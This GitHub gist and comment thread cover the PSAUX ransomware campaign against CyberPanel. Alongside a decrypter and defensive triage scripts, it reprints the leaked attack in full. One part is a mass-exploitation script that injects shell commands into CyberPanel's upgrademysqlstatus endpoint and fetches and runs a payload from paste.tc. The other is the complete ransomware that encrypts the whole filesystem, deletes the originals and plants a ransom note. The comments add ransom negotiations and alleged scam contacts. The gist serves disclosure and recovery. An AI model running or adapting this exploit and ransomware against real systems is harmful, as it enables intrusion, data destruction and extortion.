@gboddin
Last active December 14, 2024 20:07
cyberpanel 0day leaked attack script

CyberPanel ransomware attack/defense

WARNING: Please use good judgement and extra caution before downloading and running something provided in the comment section of this gist.

This repo contains 3 things:

  • A decryption script for .psaux ransoms
  • A link to a decryptor for .encryp ransoms
  • A list of files found on the PSAUX attack server

Ransomware status

We are currently aware of 3 separate groups encrypting CyberPanel instances. The extensions they leave are:

  • .psaux -> Custom ransomware, script based, decryptor available
  • .encryp -> Variant from Babuk's source, decryptor available
  • .locked -> C3RB3R Conti v3-based Ransomware, decryptor status unknown

Decryption

If your server was only targeted by PSAUX and your files have the .psaux extension, you should be able to use the decrypter 1-decrypt.sh, thanks to a flaw in PSAUX's implementation.

If your server was only targeted by the .encryp ransomware, you can use encryp_dec.out provided by v0idxyz.

#!/bin/bash
######################################################################################
# LeakIX PSAUX CyberPanel Ransom campaign decrypter                                  #
#                                                                                    #
# You have been blessed by PSAUX                                                     #
#                                                                                    #
# All your files can be decrypted.                                                   #
#                                                                                    #
#                                                                                    #
# Telegram: @psauxsec                                                                #
#                                                                                    #
# Fun must be made on that channel for weak crypto,                                  #
#                                                                                    #
# Ransomware Rushed by PSAUX                                                         #
#                                                                                    #
######################################################################################
# WARNING, WE ARE AWARE OF MULTIPLE ENCRYPTION ATTACKS. THIS SCRIPT WORKS WHEN YOUR FILES ARE ENCRYPTED WITH .psaux EXTENSION
# WARNING, ALWAYS WORK ON A COPY OF YOUR DATA, ENCRYPTED OR NOT
# WARNING, THIS SCRIPT WILL RESTORE FILES FROM THE TIME THEY WERE ENCRYPTED, BACKUP ANY CHANGES MADE AFTER THE HACK
### Fail the script if anything's wrong, that's people's data we're dealing with
set -e
echo "Running PSAUX CyberPanel decrypter..."
### Master key gently provided by PSAUX
MASTER_KEY="-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----"
MASTER_KEY_PATH="/tmp/private.pem"
echo "$MASTER_KEY" > "$MASTER_KEY_PATH"
# Decrypt the per-host AES key and IV that the ransomware RSA-wrapped into /var
openssl pkeyutl -decrypt -inkey "$MASTER_KEY_PATH" -in /var/key.enc -out /tmp/key.enc
openssl pkeyutl -decrypt -inkey "$MASTER_KEY_PATH" -in /var/iv.enc -out /tmp/iv.enc
local_key=$(xxd -p /tmp/key.enc)
local_iv=$(xxd -p /tmp/iv.enc)
echo "Recovered key: $local_key IV: $local_iv"
# Find all .psaux files and decrypt them in place; IFS= and -r keep unusual filenames intact
find / -name "*.psaux" -type f | while IFS= read -r file; do
    openssl enc -aes-128-cbc -d -K "${local_key}" -iv "${local_iv}" -in "${file}" -out "${file%.psaux}" && rm "${file}"
    echo "Restored ${file%.psaux}"
done
#!/usr/bin/env bash
private="-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDFiVLFtwUUcizD
4gUkRJayJQFAW79ZojEE8YLLnfF5x5Z1A2hP/qT21LMOmvMz03gu9Jn3G+Iby8cx
4OtvUDuG0tx+Cbq2u2lJj+ZmL11mMMbbR9aTWZhGmdVY3T9X2dObJSV94F5Itd3s
SSf4A+Osb2Ea2Ci6BCK6mCXw7Qrwr4epWuwUiZ2JqfX3Iv5oLmwLOKF/nOM0XzIp
fyopK10C/Di5erPBIAV2SYQh7sZ0JKRH7biL+s9dPM2e+8Ckuvkqkb1O1lIpOh8j
8N/dxn/y9w53KGYsSOaN0ZHseBNCbIwW1s22q4iG/p5d+UG+kTRc8HqdmENw65Vv
S8ycNPnZAgMBAAECggEBAIRgjZ7AEuBrz0IKIqX2bQK/N8J4eZhI0A7fBmcL1npk
3ZhXCz2oicZ8Le6Yumi9y6mz88Yc4n78JeZwM3aqTuoAPxEb1guFNn68t4s9LJtC
DtF+p/ahMSIHD2l5A20NJfivgRuFE8ooTqt9LxLPEHFLRsjlmQ1nnhprweleAVnf
Kl66kGZa/lAF99P7g4+3/hukVHMRPKCCEmc/77bgIw7gXe/lRutFReraGdziGky3
VkDIx7MUdGp+n4Hf4iqtUzpinN0IlvgFiMvH4aoAr5vDHitEOGuaovyeA51c2qJw
RGIAJPgWdaKj7yJl65uLmZPLxel2MCrOHqn8jv1zzw0CgYEA47kmxIT9JXoH3r0y
kxxgzR+W9FiIM+MP01F2IfoELNXP0yCZ5sSQ2p+gT61wwTZWvzmzkE8w+AcsJirs
ntlTyG5pJNQYTBSJW9lRoXykpgyRyhpEy7OES1NlWslWM2kthJQ/XZiAfaJ504ZL
cw4q3PhvcSofknRyYpLEYJ8nyg8CgYEA3hCYarpOrDxN55TB5rdU7adX4b6faK2z
NuV/grn8qqpG4nB1jj8tQI5q1NTzBe4ngLdJ6+uyGln7WvIr0llaCnhJo2Yp4EhX
5vNw3cKSdlJynZtp3k9FidhMfjrzzX3d7q7n3BFk/UgUPMRDM85q3qZzSEqLy3wI
G/WCqmMNhZcCgYBOFKMFSPAflHr0VXzs0hMi4gz5VQ3GdLltZIYT2kzqLpmms4vx
gz6Dp63pA/ggV4hg4uD9vxl0QclSgO9G/A9tLuZgWVTHaVc7pgUGUN2HjdHDMUSb
b78RsNOU0Gn9ELgpuEcNyYdtDHOnImnmVlo+D/TuIVpX9hNuVxJ8arXS4wKBgC5I
MSwVVm5JR0db1qnaTeYWOZfAHgM4KKDpZhD96G49fPaWz7ls62aICDYBiAEVaMBH
8y0re3xIgr2quX1myABkn5xhn5qyGTf2RvDBK7tjZaX5jTAbP3gCT7cDXGrYr9ee
No7ERVMQob8kfIkgnV94O5C2kLpBSINjQO94I4pTAoGASChZYdSvI46zNc8EnlcD
G7V1y3S8/Yxg3Nf7wl+s5Qot6CBRmlOOlMMQQ0JQgT5YZWcTM0IP5fEiiO6rt+w/
zHSS1/V+QNyxwb3nZhxwe0yWyqBKvDfmmxI0pRal7L6RZE9tqh40tn+Ksw4ykg5R
yROWtY+JIbuJJb26/Z5/4KQ=
-----END PRIVATE KEY-----"
echo "$private" > /var/private.pem
key_name="s2zp8fks9a0L"
echo "Encryption ID: ${key_name}"
PRIVATE_KEY_PATH="/var/private.pem"
if [ ! -f "$PRIVATE_KEY_PATH" ]; then
echo "Private key not found at $PRIVATE_KEY_PATH"
exit 1
fi
PRIVATE_KEY=$(cat $PRIVATE_KEY_PATH)
if [ -z "$PRIVATE_KEY" ]; then
echo "Could not read the private key (maybe permission issue?)"
exit 1
fi
echo "Private Key SSL: $(echo "$PRIVATE_KEY" | head -n 1)..."
login_message="
######################################################################################
# Encryptions ID : ${key_name} #
# You have been hacked by PSAUX #
# #
# All your files have been encrypted. #
# #
# To restore access, you can contact us in Telegram #
# #
# Telegram: @psauxsec #
# #
# Payment must be made in cryptocurrency. #
# #
# The price for decryption is 200 dollars. #
# Sample decryption can be served upon request. #
# #
# After payment, you will receive a key to run the decrypter script #
# on your system to restore your files. #
# All your database is downloaded and if you are not going to pay in next 3 days #
# its going to be published in darknet. Best Regards! #
# #
# #
# #
# Ransomware Made by PSAUX #
# #
######################################################################################
"
echo "$login_message" > /etc/motd
key=$(openssl rand -hex 16)
iv=$(openssl rand -hex 16)
echo "Generated key: ${key}"
echo "Generated IV: ${iv}"
echo -n $key | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/key.enc
if [ $? -eq 0 ]; then
echo "Key encrypted successfully: /var/key.enc"
else
echo "Error with key encryption"
exit 1
fi
echo -n $iv | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/iv.enc
if [ $? -eq 0 ]; then
echo "IV encrypted successfully: /var/iv.enc"
else
echo "Error with IV encryption"
exit 1
fi
excluded_dirs=(
"/proc"
"/sys"
"/dev"
"/run"
"/etc"
"/usr"
"/tmp"
"/var/run"
"/var/lock"
"/var/tmp"
"/mnt"
"/sbin"
"/lib64"
"/bin"
"/boot"
"/lib"
"/lib32"
"/srv"
"/libx32"
"/media"
"/lost+found"
)
excluded_files=(
"/var/key.enc"
"/var/iv.enc"
"/var/decrypter.sh"
"/var/index_template.html"
)
is_excluded() {
local path=$1
for excluded in "${excluded_dirs[@]}"; do
if [[ "$path" == "$excluded"* ]]; then
return 0
fi
done
for excluded in "${excluded_files[@]}"; do
if [[ "$path" == "$excluded" ]]; then
return 0
fi
done
return 1
}
encrypt_directory() {
local dir=$1
echo "Encrypting directory: $dir"
find "$dir" -type f -print0 | while IFS= read -r -d '' file; do
if ! is_excluded "$file"; then
echo "Encrypting file: $file"
openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
if [ $? -eq 0 ]; then
echo "[+] : ${file}.psaux"
rm -f "$file"
else
echo "Error encrypting: $file"
fi
else
echo "Excluded file: $file"
fi
done
}
encrypt_directory "/"
find / -type d \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found \) -prune -o -type d -print0 | while IFS= read -r -d '' dir; do
if ! is_excluded "$dir"; then
cp /var/index_template.html "$dir/index.html"
fi
done
find / -type f \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found -o -name "*.psaux" -o -name "index.html" -o -name "decrypter.sh" \) -prune -o -type f -print0 | while IFS= read -r -d '' file; do
if ! is_excluded "$file"; then
echo "[+] : $file"
openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
if [ $? -eq 0 ]; then
echo "[+] : ${file}.psaux"
rm -f "$file"
else
echo "Error encrypting: $file"
fi
else
echo "Excluded file: $file"
fi
done
rm -- "$0" && exit 0
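The leaked script above leaves a fixed set of artifacts on a host: the RSA-wrapped key and IV in /var, the dropped decrypter and index template, the ransom note in /etc/motd, an index.html copied into every unexcluded directory, and the .psaux files themselves. The following read-only triage script is an added example (not code from the gist, from LeakIX or from PSAUX) that checks a root directory, or a mounted copy of an evidence disk, for exactly those artifacts and tells you whether 1-decrypt.sh can even apply (it needs /var/key.enc and /var/iv.enc to recover the key). The paths and extensions come from this page; the sample tree built by build_sample_tree() is constructed test data.

```python
"""Triage a CyberPanel host (or a mounted copy of its disk) for PSAUX artifacts.

Added example, not part of the gist. Every path and extension it looks for is
taken from the leaked actually.sh and the README above; the sample tree built
by build_sample_tree() is constructed test data, not a real disk image.
Usage: python3 psaux_triage.py /mnt/evidence   (defaults to the sample tree)
"""
import os
import sys
import tempfile
from pathlib import Path

# Files the leaked script writes to /var (paths relative to the scanned root).
DROPPED_FILES = ["var/key.enc", "var/iv.enc", "var/decrypter.sh",
                 "var/index_template.html", "var/actually.sh"]
# Extensions left by the groups listed under "Ransomware status" and in the comments.
RANSOM_EXTENSIONS = {".psaux", ".encryp", ".locked", ".L0CK3D"}
MOTD_MARKER = "PSAUX"   # the ransom note is written to /etc/motd


def triage(root):
    """Walk `root` read-only and report which artifacts are present."""
    root = Path(root)
    report = {"dropped_files": [], "motd_tampered": False,
              "encrypted_by_ext": {}, "index_html_dropped": 0}
    for rel in DROPPED_FILES:
        if (root / rel).is_file():
            report["dropped_files"].append("/" + rel)
    motd = root / "etc" / "motd"
    if motd.is_file():
        report["motd_tampered"] = MOTD_MARKER in motd.read_text(errors="replace")
    # The script copies /var/index_template.html to index.html in every directory
    # it did not exclude; only count index.html files identical to that template.
    template = root / "var" / "index_template.html"
    template_bytes = template.read_bytes() if template.is_file() else None
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            suffix = Path(name).suffix
            if suffix in RANSOM_EXTENSIONS:
                report["encrypted_by_ext"][suffix] = report["encrypted_by_ext"].get(suffix, 0) + 1
            elif name == "index.html" and template_bytes is not None:
                try:
                    if (Path(dirpath) / name).read_bytes() == template_bytes:
                        report["index_html_dropped"] += 1
                except OSError:
                    pass
    return report


def psaux_decrypter_applicable(report):
    """1-decrypt.sh can only work if the RSA-wrapped key and IV are still in /var."""
    return ("/var/key.enc" in report["dropped_files"]
            and "/var/iv.enc" in report["dropped_files"]
            and report["encrypted_by_ext"].get(".psaux", 0) > 0)


def build_sample_tree(infected=True):
    """Constructed sample root: a hit host, or a clean one when infected=False."""
    root = Path(tempfile.mkdtemp(prefix="psaux-sample-"))
    site = root / "home" / "site" / "public_html"
    site.mkdir(parents=True)
    (root / "home" / "site" / "notes.txt").write_text("untouched")
    if not infected:
        return root
    (root / "var").mkdir()
    (root / "etc").mkdir()
    (root / "var" / "key.enc").write_bytes(b"\x00" * 256)
    (root / "var" / "iv.enc").write_bytes(b"\x00" * 256)
    (root / "var" / "index_template.html").write_text("<h1>PSAUX</h1>")
    (root / "etc" / "motd").write_text("# Ransomware Made by PSAUX #")
    (site / "wp-config.php.psaux").write_bytes(b"\x01\x02")
    (site / "db.sql.psaux").write_bytes(b"\x01\x02")
    (site / "index.html").write_text("<h1>PSAUX</h1>")
    (root / "home" / "index.html").write_text("<h1>PSAUX</h1>")
    return root


def main(argv):
    root = argv[1] if len(argv) > 1 else build_sample_tree()
    report = triage(root)
    for key, value in report.items():
        print(f"{key}: {value}")
    print("1-decrypt.sh applicable:", psaux_decrypter_applicable(report))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it against a mounted copy rather than the live root, in line with the warning at the top of 1-decrypt.sh: it never writes to the scanned tree, but the copy is what you will decrypt later anyway.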
import httpx
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
def get_CSRF_token(client):
try:
resp = client.get("/")
if resp.status_code == 200:
return resp.cookies.get('csrftoken')
else:
print(f"Failed to connect to {client.base_url}. Status code: {resp.status_code}")
return None
except httpx.RequestError:
print(f"Failed to connect to {client.base_url}")
return None
def pwn(client, CSRF_token, cmd):
if not CSRF_token:
return "No CSRF token"
headers = {
"X-CSRFToken": CSRF_token,
"Content-Type": "application/json",
"Referer": str(client.base_url)
}
payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)
try:
response = client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload)
if response.headers.get("Content-Type", "").startswith("application/json"):
return response.json().get("requestStatus", "No response")
else:
print(f"Unexpected response type from {client.base_url}: {response.text}")
return "Unexpected response"
except httpx.RequestError:
return "Failed to execute"
def execute_command(client, command):
CSRF_token = get_CSRF_token(client)
if not CSRF_token:
print(f"Could not retrieve CSRF token from {client.base_url}")
return "Failed to retrieve CSRF token"
print(f"Executing: {command} on {client.base_url}")
stdout = pwn(client, CSRF_token, command)
print(stdout)
return stdout
def process_target(target):
print(f"Processing target: {target}")
try:
client = httpx.Client(base_url=target, verify=False, timeout=5.0)
# Step 1: Download the file
if "Failed" in execute_command(client, "curl -L https://www.paste.tc/raw/asd-41506 -o /var/actually.sh"):
return
# Step 2: Check if the file exists, retry if necessary
file_exists = False
while not file_exists:
response = execute_command(client, "ls /var/actually.sh")
if "No such file or directory" not in response:
file_exists = True
print("File found. Proceeding with further steps...")
else:
print("File not found. Waiting for the download to complete...")
time.sleep(2) # Wait for 2 seconds before checking again
# Step 3: Change permissions for the downloaded file
execute_command(client, "chmod +x /var/actually.sh")
# Step 4: Remove any carriage return issues
execute_command(client, "sed -i 's/\r//g' /var/actually.sh")
# Step 5: Execute the script with nohup to detach and log to /dev/null
execute_command(client, "nohup /var/actually.sh")
print("Script executed and detached.")
except httpx.RequestError as e:
print(f"Could not connect to {target}. Error: {str(e)}")
def main(targets_file, max_threads=5):
try:
with open(targets_file, "r") as file:
targets = [line.strip() for line in file if line.strip()]
with ThreadPoolExecutor(max_threads) as executor:
future_to_target = {executor.submit(process_target, target): target for target in targets}
for future in as_completed(future_to_target):
target = future_to_target[future]
try:
future.result()
except Exception as exc:
print(f"{target} generated an exception: {exc}")
except FileNotFoundError:
print(f"Error: File {targets_file} not found.")
sys.exit(1)
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python3 ak48.py targets.txt [max_threads]")
sys.exit(1)
targets_file = sys.argv[1]
max_threads = int(sys.argv[2]) if len(sys.argv) > 2 else 5
main(targets_file, max_threads)
Oct 29 12:01:15 ready sshd[2293619]: Accepted password for root from 188.119.27.24 port 31771 ssh2
Oct 29 12:35:48 ready sshd[2294265]: Accepted password for root from 188.119.27.24 port 30923 ssh2
Oct 29 13:25:23 ready sshd[2294914]: Accepted password for root from 188.119.27.24 port 31508 ssh2
Oct 29 14:04:22 ready sshd[2295536]: Accepted password for root from 188.119.27.24 port 31502 ssh2
Oct 29 14:15:47 ready sshd[2296023]: Accepted password for root from 188.119.27.24 port 31334 ssh2
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsrBV2UGqNIQ8iL3j3/yh+qi7Q76plJteqTmS2EdQ4A8HR6yckuRnyr5s0UVDI/eiAZpiNKDDpipwULl22Sih96vFOJkKpON5bxQ4NwUFQ7Fq7wheBK9PBQ5owuBrOqIeY3D846kNejNJhDOcIiDYN9KqCeP+EGlKTFb68/nifQkPychx+z4MEm39pB7CKS+EFXsOoCmBntb7wduZf0spLtstd+bTSFxwbdgSNQU2iabazLYG05LQWTc4+Zv574Wt4608PjGE2uyofxO69XFtiYy9LvNtzmLOlJYy89M3HdQgfGzrWVC8QLLsZvuQsrRPDFb4/2/KJ5KyT9rg7qGeQQ== Suphachai
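The auth.log excerpt above shows five password-authenticated root logins from one address within a few hours, which is the kind of event a host should never accept silently. The script below is an added example (not part of the gist) that parses auth.log-style lines, groups root password logins by source address, and checks an sshd_config for the two directives that allow that login path at all. The five "Accepted password" lines are the ones published above; the publickey and "Failed password" lines are constructed for contrast.

```python
"""Flag password-authenticated root logins over SSH in auth.log-style lines.

Added example, not part of the gist. The five 'Accepted password for root'
lines are the ones published in the gist; the publickey and 'Failed password'
lines are constructed for contrast.
Usage: python3 root_ssh_logins.py /var/log/auth.log   (defaults to the sample)
"""
import re
import sys

# Constructed sample: the gist's five lines plus two made-up lines that must not match.
SAMPLE_LINES = [
    "Oct 29 11:40:02 ready sshd[2293100]: Accepted publickey for deploy from 10.0.0.5 port 51234 ssh2: ED25519 SHA256:constructed",
    "Oct 29 11:59:58 ready sshd[2293610]: Failed password for root from 188.119.27.24 port 31770 ssh2",
    "Oct 29 12:01:15 ready sshd[2293619]: Accepted password for root from 188.119.27.24 port 31771 ssh2",
    "Oct 29 12:35:48 ready sshd[2294265]: Accepted password for root from 188.119.27.24 port 30923 ssh2",
    "Oct 29 13:25:23 ready sshd[2294914]: Accepted password for root from 188.119.27.24 port 31508 ssh2",
    "Oct 29 14:04:22 ready sshd[2295536]: Accepted password for root from 188.119.27.24 port 31502 ssh2",
    "Oct 29 14:15:47 ready sshd[2296023]: Accepted password for root from 188.119.27.24 port 31334 ssh2",
]

ACCEPT_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"sshd\[(?P<pid>\d+)\]: Accepted (?P<method>\S+) for (?P<user>\S+) "
    r"from (?P<ip>[0-9a-fA-F.:]+) port (?P<port>\d+)"
)


def parse_accept(line):
    """Return the fields of an 'Accepted <method> for <user>' line, or None."""
    m = ACCEPT_RE.match(line)
    return m.groupdict() if m else None


def root_password_logins(lines):
    """Group successful password logins as root by source IP."""
    hits = {}
    for line in lines:
        ev = parse_accept(line)
        if not ev or ev["user"] != "root" or ev["method"] != "password":
            continue
        entry = hits.setdefault(ev["ip"], {"count": 0, "first": ev["ts"],
                                           "last": ev["ts"], "ports": []})
        entry["count"] += 1
        entry["last"] = ev["ts"]
        entry["ports"].append(int(ev["port"]))
    return hits


def sshd_config_findings(config_text):
    """Return the sshd_config directives still permitting root password logins.

    Only the global section is evaluated: directives after the first 'Match'
    line are conditional and ignored here. sshd keeps the first value it sees
    for a keyword, so setdefault() mirrors that. Defaults assumed are those of
    current OpenSSH: PermitRootLogin prohibit-password, PasswordAuthentication yes.
    """
    effective = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        if key == "match":
            break
        if len(parts) == 2:
            effective.setdefault(key, parts[1].strip().lower())
    findings = []
    if effective.get("permitrootlogin", "prohibit-password") == "yes":
        findings.append("PermitRootLogin")          # set to prohibit-password or no
    if effective.get("passwordauthentication", "yes") == "yes":
        findings.append("PasswordAuthentication")   # set to no and use keys
    return findings


def main(argv):
    if len(argv) > 1:
        with open(argv[1], errors="replace") as fh:
            lines = fh.read().splitlines()
    else:
        lines = SAMPLE_LINES
    hits = root_password_logins(lines)
    for ip, info in sorted(hits.items(), key=lambda kv: -kv[1]["count"]):
        print(f"{ip}: {info['count']} root password login(s), {info['first']} .. {info['last']}")
    return 1 if hits else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The exit status is 1 when any root password login is found, so the script can sit in a cron job or a CI check over collected logs; pair it with sshd_config_findings() on the host's /etc/ssh/sshd_config to confirm the login path is closed after recovery.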
@speeedooo83

Yeah, yesterday we made a new install of UBUNTU and then the new version of CYBERPANEL. This morning the server is down, so CyberPanel is like a big hole right now.... don't use it.

@silu44

silu44 commented Nov 11, 2024

Decrypt frm and other files in the mysql folder. Then reinstall the same version of CyberPanel on a test server and replace the original files with your backup. Now create backup sql files (dumps) from mysql for each database and import them to your new server.

No encrypted files in the mysql folder

@mbk87234

Sounds easy, MBK87234 - how to decrypt frm files???? We are locked with .locked and .L0CK3D.

No, a decryptor for .locked files is not yet available. In my case it was .encryp so I was lucky.

@jajonsraviation

Hi, has anyone had any success decrypting .encryp? I have tried using https://github.com/v0idxyz/babukencrypdecrytor but I'm not getting any luck. Please help with guidance.

@jajonsraviation

Sounds easy, MBK87234 - how to decrypt frm files???? We are locked with .locked and .L0CK3D.

No, a decryptor for .locked files is not yet available. In my case it was .encryp so I was lucky.

Man, how did you manage to decrypt .encryp? Some of my files were encrypted using this format.

@ronodip-basak

@jajonsraviation use the encryp_dec.out to decrypt .encryp files, it worked for me........ Make sure to only run it on a copy of the data.

@mbk87234

Sounds easy, MBK87234 - how to decrypt frm files???? We are locked with .locked and .L0CK3D.

No, a decryptor for .locked files is not yet available. In my case it was .encryp so I was lucky.

Man, how did you manage to decrypt .encryp? Some of my files were encrypted using this format.

Can you please share a sample file. Upload it to Google Drive or some other place and share the link so that I can take a look at it, because otherwise it is difficult to say why it didn't work.

@Gabitzzup

golbd, there are guys that can decrypt this but they are asking too much money for me, 5000 to 7000 USD. I got .locked files and sent them some locked files and after one hour they sent me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, let's see what we can negotiate and work out with them, this will be deeply appreciated.. Thanks

Hi guys, I didn't respond till now, but now I have news.... I negotiated with them for 550 USD. The first one, after a week, could not deliver the decryption key, so the man is legit, he never asked for money.
The other one, that actually decrypted test files, dropped from 7000 to 550 USD after a week but took the money and asked for more... so he is a thief and I think he is behind the attack or knows the attackers. I will give his contact so you are aware:
https://www.youtube.com/watch?v=UIUZGWjxaSg
officialransomsolution@gmail.com

https://t.me/RansomRescue
https://ransomrescue.org/
it has many names and many logos

@exzept

exzept commented Nov 12, 2024

golbd, there are guys that can decrypt this but they are asking too much money for me, 5000 to 7000 USD. I got .locked files and sent them some locked files and after one hour they sent me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, let's see what we can negotiate and work out with them, this will be deeply appreciated.. Thanks

Hi guys, I didn't respond till now, but now I have news.... I negotiated with them for 550 USD. The first one, after a week, could not deliver the decryption key, so the man is legit, he never asked for money. The other one, that actually decrypted test files, dropped from 7000 to 550 USD after a week but took the money and asked for more... so he is a thief and I think he is behind the attack or knows the attackers. I will give his contact so you are aware: https://www.youtube.com/watch?v=UIUZGWjxaSg officialransomsolution@gmail.com

https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

You could have asked to decrypt the test file any.

@exzept

exzept commented Nov 12, 2024

Yeah, yesterday we made a new install of UBUNTU and then the new version of CYBERPANEL. This morning the server is down, so CyberPanel is like a big hole right now.... don't use it.

There wasn't the slightest doubt in my mind, the developers are in cahoots with the scammers, determined to make money, or they would have notified you about the hack.

@Gabitzzup

golbd, there are guys that can decrypt this but they are asking too much money for me, 5000 to 7000 USD. I got .locked files and sent them some locked files and after one hour they sent me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, let's see what we can negotiate and work out with them, this will be deeply appreciated.. Thanks

Hi guys, I didn't respond till now, but now I have news.... I negotiated with them for 550 USD. The first one, after a week, could not deliver the decryption key, so the man is legit, he never asked for money. The other one, that actually decrypted test files, dropped from 7000 to 550 USD after a week but took the money and asked for more... so he is a thief and I think he is behind the attack or knows the attackers. I will give his contact so you are aware: https://www.youtube.com/watch?v=UIUZGWjxaSg officialransomsolution@gmail.com
https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

You could have asked to decrypt the test file any.

The test files were decrypted, this is why I agreed...

@exzept

exzept commented Nov 13, 2024

golbd, there are guys that can decrypt this but they are asking too much money for me, 5000 to 7000 USD. I got .locked files and sent them some locked files and after one hour they sent me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, let's see what we can negotiate and work out with them, this will be deeply appreciated.. Thanks

Hi guys, I didn't respond till now, but now I have news.... I negotiated with them for 550 USD. The first one, after a week, could not deliver the decryption key, so the man is legit, he never asked for money. The other one, that actually decrypted test files, dropped from 7000 to 550 USD after a week but took the money and asked for more... so he is a thief and I think he is behind the attack or knows the attackers. I will give his contact so you are aware: https://www.youtube.com/watch?v=UIUZGWjxaSg officialransomsolution@gmail.com
https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

You could have asked to decrypt the test file any.

The test files were decrypted, this is why I agreed...

Sadly unlucky, I got all my files back.

@exzept

exzept commented Nov 13, 2024

golbd, there are guys that can decrypt this but they are asking too much money for me, 5000 to 7000 USD. I got .locked files and sent them some locked files and after one hour they sent me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, let's see what we can negotiate and work out with them, this will be deeply appreciated.. Thanks

Hi guys, I didn't respond till now, but now I have news.... I negotiated with them for 550 USD. The first one, after a week, could not deliver the decryption key, so the man is legit, he never asked for money. The other one, that actually decrypted test files, dropped from 7000 to 550 USD after a week but took the money and asked for more... so he is a thief and I think he is behind the attack or knows the attackers. I will give his contact so you are aware: https://www.youtube.com/watch?v=UIUZGWjxaSg officialransomsolution@gmail.com
https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

You could have asked to decrypt the test file any.

The test files were decrypted, this is why I agreed...

Also attached the readme.txt file and I can decrypt 1 file, too) By the way, send those who do not spare your link to restore 1 file, we'll check if there is any key binding in the encryption.

@exzept

exzept commented Nov 13, 2024

https://t.me/RansomRescue they can't do anything, they're crooks.

@zapsjava

golbd, there are guys that can decrypt this but they are asking too much money for me, 5000 to 7000 USD. I got .locked files and sent them some locked files and after one hour they sent me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, let's see what we can negotiate and work out with them, this will be deeply appreciated.. Thanks

Hi guys, I didn't respond till now, but now I have news.... I negotiated with them for 550 USD. The first one, after a week, could not deliver the decryption key, so the man is legit, he never asked for money. The other one, that actually decrypted test files, dropped from 7000 to 550 USD after a week but took the money and asked for more... so he is a thief and I think he is behind the attack or knows the attackers. I will give his contact so you are aware: https://www.youtube.com/watch?v=UIUZGWjxaSg officialransomsolution@gmail.com
https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

You could have asked to decrypt the test file any.

The test files were decrypted, this is why I agreed...

Also attached the readme.txt file and I can decrypt 1 file, too) By the way, send those who do not spare your link to restore 1 file, we'll check if there is any key binding in the encryption.

So, you are saying that I can send you one file and you will decrypt it? How can I contact you and how much does it cost for more than one file?

@exzept

exzept commented Nov 13, 2024

golbd, there are guys that can decrypt this but they are asking too much money for me, 5000 to 7000 USD. I got .locked files and sent them some locked files and after one hour they sent me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, let's see what we can negotiate and work out with them, this will be deeply appreciated.. Thanks

Hi guys, I didn't respond till now, but now I have news.... I negotiated with them for 550 USD. The first one, after a week, could not deliver the decryption key, so the man is legit, he never asked for money. The other one, that actually decrypted test files, dropped from 7000 to 550 USD after a week but took the money and asked for more... so he is a thief and I think he is behind the attack or knows the attackers. I will give his contact so you are aware: https://www.youtube.com/watch?v=UIUZGWjxaSg officialransomsolution@gmail.com
https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

You could have asked to decrypt the test file any.

The test files were decrypted, this is why I agreed...

Also attached the readme.txt file and I can decrypt 1 file, too) By the way, send those who do not spare your link to restore 1 file, we'll check if there is any key binding in the encryption.

So, you are saying that I can send you one file and you will decrypt it? How can I contact you and how much does it cost for more than one file?

You have this feature in your test reference file.

@zjcboy
zjcboy commented Nov 15, 2024

Unfortunately, I have been infected with the locked virus, is there any way to solve it?

@exzept

exzept commented Nov 15, 2024

Unfortunately, I have been infected with the locked virus, is there any way to solve it?

What is the file extension?

@inside83

Unfortunately, I have been infected with the locked virus, is there any way to solve it?

What is the file extension?

In my case it's .L0CK3D

@zjcboy

zjcboy commented Nov 17, 2024

Unfortunately, I have been infected with the lock-screen virus, is there any way to solve it?

What is the file extension?

.locked

@jajonsraviation

Has anyone had any luck with .locked files?

@artigua
artigua commented Nov 20, 2024

Same here, CyberPanel with .locked files… What bad luck… The backups where the files were still unencrypted were deleted a while ago.

@jajonsraviation

Based on my search it seems .locked is Stampado ransomware and two tools seem to be recommended: https://success.trendmicro.com/en-US/solution/KA-0006362 and https://www.emsisoft.com/en/ransomware-decryption/stampado/

@inside83

